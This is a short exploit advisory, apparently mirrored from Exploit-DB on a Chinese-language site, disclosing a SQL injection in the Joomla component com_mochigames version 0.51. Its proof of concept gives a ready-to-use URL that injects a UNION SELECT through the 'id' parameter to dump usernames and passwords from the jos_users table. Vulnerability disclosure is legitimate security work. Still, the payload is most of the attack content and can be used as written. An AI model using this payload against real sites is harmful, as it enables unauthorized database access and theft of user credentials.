Joomla! Component com_mochigames – SQL Injection - 体验盒子

作者： B-HUNT3|2

日期： 2010-01-24

类别：

webapps

平台：

windows

来源：https://www.exploit-db.com/exploits/11243/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> RESEARCHER: B-HUNT3|2

[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com

[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection

[~]>> AFFECTED VERSIONS: Confirmed in 0.51 but probably other versions also

[~]>> RISK: Medium/High

[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=[SQL]&option=com_mochigames&Itemid=80

[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...